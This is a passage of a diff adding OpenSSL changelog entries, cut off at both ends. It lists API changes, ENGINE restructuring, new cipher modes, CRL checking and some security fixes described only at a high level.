+     supply an oversized master key in Kerberos-enabled versions.
+     (CVE-2002-0657)
+     [Ben Laurie (CHATS)]
+
+  *) Change the SSL kerb5 codes to match RFC 2712.
+     [Richard Levitte]
+
+  *) Make -nameopt work fully for req and add -reqopt switch.
+     [Michael Bell <michael.bell@rz.hu-berlin.de>, Steve Henson]
+
+  *) The "block size" for block ciphers in CFB and OFB mode should be 1.
+     [Steve Henson, reported by Yngve Nysaeter Pettersen <yngve@opera.com>]
+
+  *) Make sure tests can be performed even if the corresponding algorithms
+     have been removed entirely.  This was also the last step to make
+     OpenSSL compilable with DJGPP under all reasonable conditions.
+     [Richard Levitte, Doug Kaufman <dkaufman@rahul.net>]
+
+  *) Add cipher selection rules COMPLEMENTOFALL and COMPLEMENTOFDEFAULT
+     to allow version independent disabling of normally unselected ciphers,
+     which may be activated as a side-effect of selecting a single cipher.
+
+     (E.g., cipher list string "RSA" enables ciphersuites that are left
+     out of "ALL" because they do not provide symmetric encryption.
+     "RSA:!COMPLEMEMENTOFALL" avoids these unsafe ciphersuites.)
+     [Lutz Jaenicke, Bodo Moeller]
+
+  *) Add appropriate support for separate platform-dependent build
+     directories.  The recommended way to make a platform-dependent
+     build directory is the following (tested on Linux), maybe with
+     some local tweaks:
+
+	# Place yourself outside of the OpenSSL source tree.  In
+	# this example, the environment variable OPENSSL_SOURCE
+	# is assumed to contain the absolute OpenSSL source directory.
+	mkdir -p objtree/"`uname -s`-`uname -r`-`uname -m`"
+	cd objtree/"`uname -s`-`uname -r`-`uname -m`"
+	(cd $OPENSSL_SOURCE; find . -type f) | while read F; do
+		mkdir -p `dirname $F`
+		ln -s $OPENSSL_SOURCE/$F $F
+	done
+
+     To be absolutely sure not to disturb the source tree, a "make clean"
+     is a good thing.  If it isn't successfull, don't worry about it,
+     it probably means the source directory is very clean.
+     [Richard Levitte]
+
+  *) Make sure any ENGINE control commands make local copies of string
+     pointers passed to them whenever necessary. Otherwise it is possible
+     the caller may have overwritten (or deallocated) the original string
+     data when a later ENGINE operation tries to use the stored values.
+     [Götz Babin-Ebell <babinebell@trustcenter.de>]
+
+  *) Improve diagnostics in file reading and command-line digests.
+     [Ben Laurie aided and abetted by Solar Designer <solar@openwall.com>]
+
+  *) Add AES modes CFB and OFB to the object database.  Correct an
+     error in AES-CFB decryption.
+     [Richard Levitte]
+
+  *) Remove most calls to EVP_CIPHER_CTX_cleanup() in evp_enc.c, this 
+     allows existing EVP_CIPHER_CTX structures to be reused after
+     calling EVP_*Final(). This behaviour is used by encryption
+     BIOs and some applications. This has the side effect that
+     applications must explicitly clean up cipher contexts with
+     EVP_CIPHER_CTX_cleanup() or they will leak memory.
+     [Steve Henson]
+
+  *) Check the values of dna and dnb in bn_mul_recursive before calling
+     bn_mul_comba (a non zero value means the a or b arrays do not contain
+     n2 elements) and fallback to bn_mul_normal if either is not zero.
+     [Steve Henson]
+
+  *) Fix escaping of non-ASCII characters when using the -subj option
+     of the "openssl req" command line tool. (Robert Joop <joop@fokus.gmd.de>)
+     [Lutz Jaenicke]
+
+  *) Make object definitions compliant to LDAP (RFC2256): SN is the short
+     form for "surname", serialNumber has no short form.
+     Use "mail" as the short name for "rfc822Mailbox" according to RFC2798;
+     therefore remove "mail" short name for "internet 7".
+     The OID for unique identifiers in X509 certificates is
+     x500UniqueIdentifier, not uniqueIdentifier.
+     Some more OID additions. (Michael Bell <michael.bell@rz.hu-berlin.de>)
+     [Lutz Jaenicke]
+
+  *) Add an "init" command to the ENGINE config module and auto initialize
+     ENGINEs. Without any "init" command the ENGINE will be initialized 
+     after all ctrl commands have been executed on it. If init=1 the 
+     ENGINE is initailized at that point (ctrls before that point are run
+     on the uninitialized ENGINE and after on the initialized one). If
+     init=0 then the ENGINE will not be iniatialized at all.
+     [Steve Henson]
+
+  *) Fix the 'app_verify_callback' interface so that the user-defined
+     argument is actually passed to the callback: In the
+     SSL_CTX_set_cert_verify_callback() prototype, the callback
+     declaration has been changed from
+          int (*cb)()
+     into
+          int (*cb)(X509_STORE_CTX *,void *);
+     in ssl_verify_cert_chain (ssl/ssl_cert.c), the call
+          i=s->ctx->app_verify_callback(&ctx)
+     has been changed into
+          i=s->ctx->app_verify_callback(&ctx, s->ctx->app_verify_arg).
+
+     To update applications using SSL_CTX_set_cert_verify_callback(),
+     a dummy argument can be added to their callback functions.
+     [D. K. Smetters <smetters@parc.xerox.com>]
+
+  *) Added the '4758cca' ENGINE to support IBM 4758 cards.
+     [Maurice Gittens <maurice@gittens.nl>, touchups by Geoff Thorpe]
+
+  *) Add and OPENSSL_LOAD_CONF define which will cause
+     OpenSSL_add_all_algorithms() to load the openssl.cnf config file.
+     This allows older applications to transparently support certain
+     OpenSSL features: such as crypto acceleration and dynamic ENGINE loading.
+     Two new functions OPENSSL_add_all_algorithms_noconf() which will never
+     load the config file and OPENSSL_add_all_algorithms_conf() which will
+     always load it have also been added.
+     [Steve Henson]
+
+  *) Add the OFB, CFB and CTR (all with 128 bit feedback) to AES.
+     Adjust NIDs and EVP layer.
+     [Stephen Sprunk <stephen@sprunk.org> and Richard Levitte]
+
+  *) Config modules support in openssl utility.
+
+     Most commands now load modules from the config file,
+     though in a few (such as version) this isn't done 
+     because it couldn't be used for anything.
+
+     In the case of ca and req the config file used is
+     the same as the utility itself: that is the -config
+     command line option can be used to specify an
+     alternative file.
+     [Steve Henson]
+
+  *) Move default behaviour from OPENSSL_config(). If appname is NULL
+     use "openssl_conf" if filename is NULL use default openssl config file.
+     [Steve Henson]
+
+  *) Add an argument to OPENSSL_config() to allow the use of an alternative
+     config section name. Add a new flag to tolerate a missing config file
+     and move code to CONF_modules_load_file().
+     [Steve Henson]
+
+  *) Support for crypto accelerator cards from Accelerated Encryption
+     Processing, www.aep.ie.  (Use engine 'aep')
+     The support was copied from 0.9.6c [engine] and adapted/corrected
+     to work with the new engine framework.
+     [AEP Inc. and Richard Levitte]
+
+  *) Support for SureWare crypto accelerator cards from Baltimore
+     Technologies.  (Use engine 'sureware')
+     The support was copied from 0.9.6c [engine] and adapted
+     to work with the new engine framework.
+     [Richard Levitte]
+
+  *) Have the CHIL engine fork-safe (as defined by nCipher) and actually
+     make the newer ENGINE framework commands for the CHIL engine work.
+     [Toomas Kiisk <vix@cyber.ee> and Richard Levitte]
+
+  *) Make it possible to produce shared libraries on ReliantUNIX.
+     [Robert Dahlem <Robert.Dahlem@ffm2.siemens.de> via Richard Levitte]
+
+  *) Add the configuration target debug-linux-ppro.
+     Make 'openssl rsa' use the general key loading routines
+     implemented in apps.c, and make those routines able to
+     handle the key format FORMAT_NETSCAPE and the variant
+     FORMAT_IISSGC.
+     [Toomas Kiisk <vix@cyber.ee> via Richard Levitte]
+
+ *) Fix a crashbug and a logic bug in hwcrhk_load_pubkey().
+     [Toomas Kiisk <vix@cyber.ee> via Richard Levitte]
+
+  *) Add -keyform to rsautl, and document -engine.
+     [Richard Levitte, inspired by Toomas Kiisk <vix@cyber.ee>]
+
+  *) Change BIO_new_file (crypto/bio/bss_file.c) to use new
+     BIO_R_NO_SUCH_FILE error code rather than the generic
+     ERR_R_SYS_LIB error code if fopen() fails with ENOENT.
+     [Ben Laurie]
+
+  *) Add new functions
+          ERR_peek_last_error
+          ERR_peek_last_error_line
+          ERR_peek_last_error_line_data.
+     These are similar to
+          ERR_peek_error
+          ERR_peek_error_line
+          ERR_peek_error_line_data,
+     but report on the latest error recorded rather than the first one
+     still in the error queue.
+     [Ben Laurie, Bodo Moeller]
+        
+  *) default_algorithms option in ENGINE config module. This allows things
+     like:
+     default_algorithms = ALL
+     default_algorithms = RSA, DSA, RAND, CIPHERS, DIGESTS
+     [Steve Henson]
+
+  *) Prelminary ENGINE config module.
+     [Steve Henson]
+
+  *) New experimental application configuration code.
+     [Steve Henson]
+
+  *) Change the AES code to follow the same name structure as all other
+     symmetric ciphers, and behave the same way.  Move everything to
+     the directory crypto/aes, thereby obsoleting crypto/rijndael.
+     [Stephen Sprunk <stephen@sprunk.org> and Richard Levitte]
+
+  *) SECURITY: remove unsafe setjmp/signal interaction from ui_openssl.c.
+     [Ben Laurie and Theo de Raadt]
+
+  *) Add option to output public keys in req command.
+     [Massimiliano Pala madwolf@openca.org]
+
+  *) Use wNAFs in EC_POINTs_mul() for improved efficiency
+     (up to about 10% better than before for P-192 and P-224).
+     [Bodo Moeller]
+
+  *) New functions/macros
+
+          SSL_CTX_set_msg_callback(ctx, cb)
+          SSL_CTX_set_msg_callback_arg(ctx, arg)
+          SSL_set_msg_callback(ssl, cb)
+          SSL_set_msg_callback_arg(ssl, arg)
+
+     to request calling a callback function
+
+          void cb(int write_p, int version, int content_type,
+                  const void *buf, size_t len, SSL *ssl, void *arg)
+
+     whenever a protocol message has been completely received
+     (write_p == 0) or sent (write_p == 1).  Here 'version' is the
+     protocol version  according to which the SSL library interprets
+     the current protocol message (SSL2_VERSION, SSL3_VERSION, or
+     TLS1_VERSION).  'content_type' is 0 in the case of SSL 2.0, or
+     the content type as defined in the SSL 3.0/TLS 1.0 protocol
+     specification (change_cipher_spec(20), alert(21), handshake(22)).
+     'buf' and 'len' point to the actual message, 'ssl' to the
+     SSL object, and 'arg' is the application-defined value set by
+     SSL[_CTX]_set_msg_callback_arg().
+
+     'openssl s_client' and 'openssl s_server' have new '-msg' options
+     to enable a callback that displays all protocol messages.
+     [Bodo Moeller]
+
+  *) Change the shared library support so shared libraries are built as
+     soon as the corresponding static library is finished, and thereby get
+     openssl and the test programs linked against the shared library.
+     This still only happens when the keyword "shard" has been given to
+     the configuration scripts.
+
+     NOTE: shared library support is still an experimental thing, and
+     backward binary compatibility is still not guaranteed.
+     ["Maciej W. Rozycki" <macro@ds2.pg.gda.pl> and Richard Levitte]
+
+  *) Add support for Subject Information Access extension.
+     [Peter Sylvester <Peter.Sylvester@EdelWeb.fr>]
+
+  *) Make BUF_MEM_grow() behaviour more consistent: Initialise to zero
+     additional bytes when new memory had to be allocated, not just
+     when reusing an existing buffer.
+     [Bodo Moeller]
+
+  *) New command line and configuration option 'utf8' for the req command.
+     This allows field values to be specified as UTF8 strings.
+     [Steve Henson]
+
+  *) Add -multi and -mr options to "openssl speed" - giving multiple parallel
+     runs for the former and machine-readable output for the latter.
+     [Ben Laurie]
+
+  *) Add '-noemailDN' option to 'openssl ca'.  This prevents inclusion
+     of the e-mail address in the DN (i.e., it will go into a certificate
+     extension only).  The new configuration file option 'email_in_dn = no'
+     has the same effect.
+     [Massimiliano Pala madwolf@openca.org]
+
+  *) Change all functions with names starting with des_ to be starting
+     with DES_ instead.  Add wrappers that are compatible with libdes,
+     but are named _ossl_old_des_*.  Finally, add macros that map the
+     des_* symbols to the corresponding _ossl_old_des_* if libdes
+     compatibility is desired.  If OpenSSL 0.9.6c compatibility is
+     desired, the des_* symbols will be mapped to DES_*, with one
+     exception.
+
+     Since we provide two compatibility mappings, the user needs to
+     define the macro OPENSSL_DES_LIBDES_COMPATIBILITY if libdes
+     compatibility is desired.  The default (i.e., when that macro
+     isn't defined) is OpenSSL 0.9.6c compatibility.
+
+     There are also macros that enable and disable the support of old
+     des functions altogether.  Those are OPENSSL_ENABLE_OLD_DES_SUPPORT
+     and OPENSSL_DISABLE_OLD_DES_SUPPORT.  If none or both of those
+     are defined, the default will apply: to support the old des routines.
+
+     In either case, one must include openssl/des.h to get the correct
+     definitions.  Do not try to just include openssl/des_old.h, that
+     won't work.
+
+     NOTE: This is a major break of an old API into a new one.  Software
+     authors are encouraged to switch to the DES_ style functions.  Some
+     time in the future, des_old.h and the libdes compatibility functions
+     will be disable (i.e. OPENSSL_DISABLE_OLD_DES_SUPPORT will be the
+     default), and then completely removed.
+     [Richard Levitte]
+
+  *) Test for certificates which contain unsupported critical extensions.
+     If such a certificate is found during a verify operation it is 
+     rejected by default: this behaviour can be overridden by either
+     handling the new error X509_V_ERR_UNHANDLED_CRITICAL_EXTENSION or
+     by setting the verify flag X509_V_FLAG_IGNORE_CRITICAL. A new function
+     X509_supported_extension() has also been added which returns 1 if a
+     particular extension is supported.
+     [Steve Henson]
+
+  *) Modify the behaviour of EVP cipher functions in similar way to digests
+     to retain compatibility with existing code.
+     [Steve Henson]
+
+  *) Modify the behaviour of EVP_DigestInit() and EVP_DigestFinal() to retain
+     compatibility with existing code. In particular the 'ctx' parameter does
+     not have to be to be initialized before the call to EVP_DigestInit() and
+     it is tidied up after a call to EVP_DigestFinal(). New function
+     EVP_DigestFinal_ex() which does not tidy up the ctx. Similarly function
+     EVP_MD_CTX_copy() changed to not require the destination to be
+     initialized valid and new function EVP_MD_CTX_copy_ex() added which
+     requires the destination to be valid.
+
+     Modify all the OpenSSL digest calls to use EVP_DigestInit_ex(),
+     EVP_DigestFinal_ex() and EVP_MD_CTX_copy_ex().
+     [Steve Henson]
+
+  *) Change ssl3_get_message (ssl/s3_both.c) and the functions using it
+     so that complete 'Handshake' protocol structures are kept in memory
+     instead of overwriting 'msg_type' and 'length' with 'body' data.
+     [Bodo Moeller]
+
+  *) Add an implementation of SSL_add_dir_cert_subjects_to_stack for Win32.
+     [Massimo Santin via Richard Levitte]
+
+  *) Major restructuring to the underlying ENGINE code. This includes
+     reduction of linker bloat, separation of pure "ENGINE" manipulation
+     (initialisation, etc) from functionality dealing with implementations
+     of specific crypto iterfaces. This change also introduces integrated
+     support for symmetric ciphers and digest implementations - so ENGINEs
+     can now accelerate these by providing EVP_CIPHER and EVP_MD
+     implementations of their own. This is detailed in crypto/engine/README
+     as it couldn't be adequately described here. However, there are a few
+     API changes worth noting - some RSA, DSA, DH, and RAND functions that
+     were changed in the original introduction of ENGINE code have now
+     reverted back - the hooking from this code to ENGINE is now a good
+     deal more passive and at run-time, operations deal directly with
+     RSA_METHODs, DSA_METHODs (etc) as they did before, rather than
+     dereferencing through an ENGINE pointer any more. Also, the ENGINE
+     functions dealing with BN_MOD_EXP[_CRT] handlers have been removed -
+     they were not being used by the framework as there is no concept of a
+     BIGNUM_METHOD and they could not be generalised to the new
+     'ENGINE_TABLE' mechanism that underlies the new code. Similarly,
+     ENGINE_cpy() has been removed as it cannot be consistently defined in
+     the new code.
+     [Geoff Thorpe]
+
+  *) Change ASN1_GENERALIZEDTIME_check() to allow fractional seconds.
+     [Steve Henson]
+
+  *) Change mkdef.pl to sort symbols that get the same entry number,
+     and make sure the automatically generated functions ERR_load_*
+     become part of libeay.num as well.
+     [Richard Levitte]
+
+  *) New function SSL_renegotiate_pending().  This returns true once
+     renegotiation has been requested (either SSL_renegotiate() call
+     or HelloRequest/ClientHello receveived from the peer) and becomes
+     false once a handshake has been completed.
+     (For servers, SSL_renegotiate() followed by SSL_do_handshake()
+     sends a HelloRequest, but does not ensure that a handshake takes
+     place.  SSL_renegotiate_pending() is useful for checking if the
+     client has followed the request.)
+     [Bodo Moeller]
+
+  *) New SSL option SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION.
+     By default, clients may request session resumption even during
+     renegotiation (if session ID contexts permit); with this option,
+     session resumption is possible only in the first handshake.
+
+     SSL_OP_ALL is now 0x00000FFFL instead of 0x000FFFFFL.  This makes
+     more bits available for options that should not be part of
+     SSL_OP_ALL (such as SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION).
+     [Bodo Moeller]
+
+  *) Add some demos for certificate and certificate request creation.
+     [Steve Henson]
+
+  *) Make maximum certificate chain size accepted from the peer application
+     settable (SSL*_get/set_max_cert_list()), as proposed by
+     "Douglas E. Engert" <deengert@anl.gov>.
+     [Lutz Jaenicke]
+
+  *) Add support for shared libraries for Unixware-7
+     (Boyd Lynn Gerber <gerberb@zenez.com>).
+     [Lutz Jaenicke]
+
+  *) Add a "destroy" handler to ENGINEs that allows structural cleanup to
+     be done prior to destruction. Use this to unload error strings from
+     ENGINEs that load their own error strings. NB: This adds two new API
+     functions to "get" and "set" this destroy handler in an ENGINE.
+     [Geoff Thorpe]
+
+  *) Alter all existing ENGINE implementations (except "openssl" and
+     "openbsd") to dynamically instantiate their own error strings. This
+     makes them more flexible to be built both as statically-linked ENGINEs
+     and self-contained shared-libraries loadable via the "dynamic" ENGINE.
+     Also, add stub code to each that makes building them as self-contained
+     shared-libraries easier (see README.ENGINE).
+     [Geoff Thorpe]
+
+  *) Add a "dynamic" ENGINE that provides a mechanism for binding ENGINE
+     implementations into applications that are completely implemented in
+     self-contained shared-libraries. The "dynamic" ENGINE exposes control
+     commands that can be used to configure what shared-library to load and
+     to control aspects of the way it is handled. Also, made an update to
+     the README.ENGINE file that brings its information up-to-date and
+     provides some information and instructions on the "dynamic" ENGINE
+     (ie. how to use it, how to build "dynamic"-loadable ENGINEs, etc).
+     [Geoff Thorpe]
+
+  *) Make it possible to unload ranges of ERR strings with a new
+     "ERR_unload_strings" function.
+     [Geoff Thorpe]
+
+  *) Add a copy() function to EVP_MD.
+     [Ben Laurie]
+
+  *) Make EVP_MD routines take a context pointer instead of just the
+     md_data void pointer.
+     [Ben Laurie]
+
+  *) Add flags to EVP_MD and EVP_MD_CTX. EVP_MD_FLAG_ONESHOT indicates
+     that the digest can only process a single chunk of data
+     (typically because it is provided by a piece of
+     hardware). EVP_MD_CTX_FLAG_ONESHOT indicates that the application
+     is only going to provide a single chunk of data, and hence the
+     framework needn't accumulate the data for oneshot drivers.
+     [Ben Laurie]
+
+  *) As with "ERR", make it possible to replace the underlying "ex_data"
+     functions. This change also alters the storage and management of global
+     ex_data state - it's now all inside ex_data.c and all "class" code (eg.
+     RSA, BIO, SSL_CTX, etc) no longer stores its own STACKS and per-class
+     index counters. The API functions that use this state have been changed
+     to take a "class_index" rather than pointers to the class's local STACK
+     and counter, and there is now an API function to dynamically create new
+     classes. This centralisation allows us to (a) plug a lot of the
+     thread-safety problems that existed, and (b) makes it possible to clean
+     up all allocated state using "CRYPTO_cleanup_all_ex_data()". W.r.t. (b)
+     such data would previously have always leaked in application code and
+     workarounds were in place to make the memory debugging turn a blind eye
+     to it. Application code that doesn't use this new function will still
+     leak as before, but their memory debugging output will announce it now
+     rather than letting it slide.
+
+     Besides the addition of CRYPTO_cleanup_all_ex_data(), another API change
+     induced by the "ex_data" overhaul is that X509_STORE_CTX_init() now
+     has a return value to indicate success or failure.
+     [Geoff Thorpe]
+
+  *) Make it possible to replace the underlying "ERR" functions such that the
+     global state (2 LHASH tables and 2 locks) is only used by the "default"
+     implementation. This change also adds two functions to "get" and "set"
+     the implementation prior to it being automatically set the first time
+     any other ERR function takes place. Ie. an application can call "get",
+     pass the return value to a module it has just loaded, and that module
+     can call its own "set" function using that value. This means the
+     module's "ERR" operations will use (and modify) the error state in the
+     application and not in its own statically linked copy of OpenSSL code.
+     [Geoff Thorpe]
+
+  *) Give DH, DSA, and RSA types their own "**_up_ref()" function to increment
+     reference counts. This performs normal REF_PRINT/REF_CHECK macros on
+     the operation, and provides a more encapsulated way for external code
+     (crypto/evp/ and ssl/) to do this. Also changed the evp and ssl code
+     to use these functions rather than manually incrementing the counts.
+
+     Also rename "DSO_up()" function to more descriptive "DSO_up_ref()".
+     [Geoff Thorpe]
+
+  *) Add EVP test program.
+     [Ben Laurie]
+
+  *) Add symmetric cipher support to ENGINE. Expect the API to change!
+     [Ben Laurie]
+
+  *) New CRL functions: X509_CRL_set_version(), X509_CRL_set_issuer_name()
+     X509_CRL_set_lastUpdate(), X509_CRL_set_nextUpdate(), X509_CRL_sort(),
+     X509_REVOKED_set_serialNumber(), and X509_REVOKED_set_revocationDate().
+     These allow a CRL to be built without having to access X509_CRL fields
+     directly. Modify 'ca' application to use new functions.
+     [Steve Henson]
+
+  *) Move SSL_OP_TLS_ROLLBACK_BUG out of the SSL_OP_ALL list of recommended
+     bug workarounds. Rollback attack detection is a security feature.
+     The problem will only arise on OpenSSL servers when TLSv1 is not
+     available (sslv3_server_method() or SSL_OP_NO_TLSv1).
+     Software authors not wanting to support TLSv1 will have special reasons
+     for their choice and can explicitly enable this option.
+     [Bodo Moeller, Lutz Jaenicke]
+
+  *) Rationalise EVP so it can be extended: don't include a union of
+     cipher/digest structures, add init/cleanup functions for EVP_MD_CTX
+     (similar to those existing for EVP_CIPHER_CTX).
+     Usage example:
+
+         EVP_MD_CTX md;
+
+         EVP_MD_CTX_init(&md);             /* new function call */
+         EVP_DigestInit(&md, EVP_sha1());
+         EVP_DigestUpdate(&md, in, len);
+         EVP_DigestFinal(&md, out, NULL);
+         EVP_MD_CTX_cleanup(&md);          /* new function call */
+
+     [Ben Laurie]
+
+  *) Make DES key schedule conform to the usual scheme, as well as
+     correcting its structure. This means that calls to DES functions
+     now have to pass a pointer to a des_key_schedule instead of a
+     plain des_key_schedule (which was actually always a pointer
+     anyway): E.g.,
+
+         des_key_schedule ks;
+
+	 des_set_key_checked(..., &ks);
+	 des_ncbc_encrypt(..., &ks, ...);
+
+     (Note that a later change renames 'des_...' into 'DES_...'.)
+     [Ben Laurie]
+
+  *) Initial reduction of linker bloat: the use of some functions, such as
+     PEM causes large amounts of unused functions to be linked in due to
+     poor organisation. For example pem_all.c contains every PEM function
+     which has a knock on effect of linking in large amounts of (unused)
+     ASN1 code. Grouping together similar functions and splitting unrelated
+     functions prevents this.
+     [Steve Henson]
+
+  *) Cleanup of EVP macros.
+     [Ben Laurie]
+
+  *) Change historical references to {NID,SN,LN}_des_ede and ede3 to add the
+     correct _ecb suffix.
+     [Ben Laurie]
+
+  *) Add initial OCSP responder support to ocsp application. The
+     revocation information is handled using the text based index
+     use by the ca application. The responder can either handle
+     requests generated internally, supplied in files (for example
+     via a CGI script) or using an internal minimal server.
+     [Steve Henson]
+
+  *) Add configuration choices to get zlib compression for TLS.
+     [Richard Levitte]
+
+  *) Changes to Kerberos SSL for RFC 2712 compliance:
+     1.  Implemented real KerberosWrapper, instead of just using
+         KRB5 AP_REQ message.  [Thanks to Simon Wilkinson <sxw@sxw.org.uk>]
+     2.  Implemented optional authenticator field of KerberosWrapper.
+
+     Added openssl-style ASN.1 macros for Kerberos ticket, ap_req,
+     and authenticator structs; see crypto/krb5/.
+
+     Generalized Kerberos calls to support multiple Kerberos libraries.
+     [Vern Staats <staatsvr@asc.hpc.mil>,
+      Jeffrey Altman <jaltman@columbia.edu>
+      via Richard Levitte]
+
+  *) Cause 'openssl speed' to use fully hard-coded DSA keys as it
+     already does with RSA. testdsa.h now has 'priv_key/pub_key'
+     values for each of the key sizes rather than having just
+     parameters (and 'speed' generating keys each time).
+     [Geoff Thorpe]
+
+  *) Speed up EVP routines.
+     Before:
+encrypt
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+des-cbc           4408.85k     5560.51k     5778.46k     5862.20k     5825.16k
+des-cbc           4389.55k     5571.17k     5792.23k     5846.91k     5832.11k
+des-cbc           4394.32k     5575.92k     5807.44k     5848.37k     5841.30k
+decrypt
+des-cbc           3482.66k     5069.49k     5496.39k     5614.16k     5639.28k
+des-cbc           3480.74k     5068.76k     5510.34k     5609.87k     5635.52k
+des-cbc           3483.72k     5067.62k     5504.60k     5708.01k     5724.80k
+     After:
+encrypt
+des-cbc           4660.16k     5650.19k     5807.19k     5827.13k     5783.32k
+decrypt
+des-cbc           3624.96k     5258.21k     5530.91k     5624.30k     5628.26k
+     [Ben Laurie]
+
+  *) Added the OS2-EMX target.
+     ["Brian Havard" <brianh@kheldar.apana.org.au> and Richard Levitte]
+
+  *) Rewrite apps to use NCONF routines instead of the old CONF. New functions
+     to support NCONF routines in extension code. New function CONF_set_nconf()
+     to allow functions which take an NCONF to also handle the old LHASH
+     structure: this means that the old CONF compatible routines can be
+     retained (in particular wrt extensions) without having to duplicate the
+     code. New function X509V3_add_ext_nconf_sk to add extensions to a stack.
+     [Steve Henson]
+
+  *) Enhance the general user interface with mechanisms for inner control
+     and with possibilities to have yes/no kind of prompts.
+     [Richard Levitte]
+
+  *) Change all calls to low level digest routines in the library and
+     applications to use EVP. Add missing calls to HMAC_cleanup() and
+     don't assume HMAC_CTX can be copied using memcpy().
+     [Verdon Walker <VWalker@novell.com>, Steve Henson]
+
+  *) Add the possibility to control engines through control names but with
+     arbitrary arguments instead of just a string.
+     Change the key loaders to take a UI_METHOD instead of a callback
+     function pointer.  NOTE: this breaks binary compatibility with earlier
+     versions of OpenSSL [engine].
+     Adapt the nCipher code for these new conditions and add a card insertion
+     callback.
+     [Richard Levitte]
+
+  *) Enhance the general user interface with mechanisms to better support
+     dialog box interfaces, application-defined prompts, the possibility
+     to use defaults (for example default passwords from somewhere else)
+     and interrupts/cancellations.
+     [Richard Levitte]
+
+  *) Tidy up PKCS#12 attribute handling. Add support for the CSP name
+     attribute in PKCS#12 files, add new -CSP option to pkcs12 utility.
+     [Steve Henson]
+
+  *) Fix a memory leak in 'sk_dup()' in the case reallocation fails. (Also
+     tidy up some unnecessarily weird code in 'sk_new()').
+     [Geoff, reported by Diego Tartara <dtartara@novamens.com>]
+
+  *) Change the key loading routines for ENGINEs to use the same kind
+     callback (pem_password_cb) as all other routines that need this
+     kind of callback.
+     [Richard Levitte]
+
+  *) Increase ENTROPY_NEEDED to 32 bytes, as Rijndael can operate with
+     256 bit (=32 byte) keys. Of course seeding with more entropy bytes
+     than this minimum value is recommended.
+     [Lutz Jaenicke]
+
+  *) New random seeder for OpenVMS, using the system process statistics
+     that are easily reachable.
+     [Richard Levitte]
+
+  *) Windows apparently can't transparently handle global
+     variables defined in DLLs. Initialisations such as:
+
+        const ASN1_ITEM *it = &ASN1_INTEGER_it;
+
+     wont compile. This is used by the any applications that need to
+     declare their own ASN1 modules. This was fixed by adding the option
+     EXPORT_VAR_AS_FN to all Win32 platforms, although this isn't strictly
+     needed for static libraries under Win32.
+     [Steve Henson]
+
+  *) New functions X509_PURPOSE_set() and X509_TRUST_set() to handle
+     setting of purpose and trust fields. New X509_STORE trust and
+     purpose functions and tidy up setting in other SSL functions.
+     [Steve Henson]
+
+  *) Add copies of X509_STORE_CTX fields and callbacks to X509_STORE
+     structure. These are inherited by X509_STORE_CTX when it is 
+     initialised. This allows various defaults to be set in the
+     X509_STORE structure (such as flags for CRL checking and custom
+     purpose or trust settings) for functions which only use X509_STORE_CTX
+     internally such as S/MIME.
+
+     Modify X509_STORE_CTX_purpose_inherit() so it only sets purposes and
+     trust settings if they are not set in X509_STORE. This allows X509_STORE
+     purposes and trust (in S/MIME for example) to override any set by default.
+
+     Add command line options for CRL checking to smime, s_client and s_server
+     applications.
+     [Steve Henson]
+
+  *) Initial CRL based revocation checking. If the CRL checking flag(s)
+     are set then the CRL is looked up in the X509_STORE structure and
+     its validity and signature checked, then if the certificate is found
+     in the CRL the verify fails with a revoked error.
+
+     Various new CRL related callbacks added to X509_STORE_CTX structure.
+
+     Command line options added to 'verify' application to support this.
+
+     This needs some additional work, such as being able to handle multiple
+     CRLs with different times, extension based lookup (rather than just
+     by subject name) and ultimately more complete V2 CRL extension
+     handling.
+     [Steve Henson]
+
+  *) Add a general user interface API (crypto/ui/).  This is designed
+     to replace things like des_read_password and friends (backward
+     compatibility functions using this new API are provided).
+     The purpose is to remove prompting functions from the DES code
+     section as well as provide for prompting through dialog boxes in
+     a window system and the like.
+     [Richard Levitte]
+
+  *) Add "ex_data" support to ENGINE so implementations can add state at a
+     per-structure level rather than having to store it globally.
+     [Geoff]
+
+  *) Make it possible for ENGINE structures to be copied when retrieved by
+     ENGINE_by_id() if the ENGINE specifies a new flag: ENGINE_FLAGS_BY_ID_COPY.
+     This causes the "original" ENGINE structure to act like a template,
+     analogous to the RSA vs. RSA_METHOD type of separation. Because of this
+     operational state can be localised to each ENGINE structure, despite the
+     fact they all share the same "methods". New ENGINE structures returned in
+     this case have no functional references and the return value is the single
+     structural reference. This matches the single structural reference returned
+     by ENGINE_by_id() normally, when it is incremented on the pre-existing
+     ENGINE structure.
+     [Geoff]
+
+  *) Fix ASN1 decoder when decoding type ANY and V_ASN1_OTHER: since this
+     needs to match any other type at all we need to manually clear the
+     tag cache.
+     [Steve Henson]
+
+  *) Changes to the "openssl engine" utility to include;
+     - verbosity levels ('-v', '-vv', and '-vvv') that provide information
+       about an ENGINE's available control commands.
+     - executing control commands from command line arguments using the
+       '-pre' and '-post' switches. '-post' is only used if '-t' is
+       specified and the ENGINE is successfully initialised. The syntax for
+       the individual commands are colon-separated, for example;
+	 openssl engine chil -pre FORK_CHECK:0 -pre SO_PATH:/lib/test.so
+     [Geoff]
+
+  *) New dynamic control command support for ENGINEs. ENGINEs can now
+     declare their own commands (numbers), names (strings), descriptions,
+     and input types for run-time discovery by calling applications. A
+     subset of these commands are implicitly classed as "executable"
+     depending on their input type, and only these can be invoked through
+     the new string-based API function ENGINE_ctrl_cmd_string(). (Eg. this
+     can be based on user input, config files, etc). The distinction is
+     that "executable" commands cannot return anything other than a boolean
+     result and can only support numeric or string input, whereas some
+     discoverable commands may only be for direct use through
+     ENGINE_ctrl(), eg. supporting the exchange of binary data, function
+     pointers, or other custom uses. The "executable" commands are to
+     support parameterisations of ENGINE behaviour that can be
+     unambiguously defined by ENGINEs and used consistently across any
+     OpenSSL-based application. Commands have been added to all the
+     existing hardware-supporting ENGINEs, noticeably "SO_PATH" to allow
+     control over shared-library paths without source code alterations.
+     [Geoff]
+
+  *) Changed all ENGINE implementations to dynamically allocate their
+     ENGINEs rather than declaring them statically. Apart from this being
+     necessary with the removal of the ENGINE_FLAGS_MALLOCED distinction,
+     this also allows the implementations to compile without using the
+     internal engine_int.h header.
+     [Geoff]
+
+  *) Minor adjustment to "rand" code. RAND_get_rand_method() now returns a
+     'const' value. Any code that should be able to modify a RAND_METHOD
+     should already have non-const pointers to it (ie. they should only
+     modify their own ones).
+     [Geoff]
+
+  *) Made a variety of little tweaks to the ENGINE code.
+     - "atalla" and "ubsec" string definitions were moved from header files
+       to C code. "nuron" string definitions were placed in variables
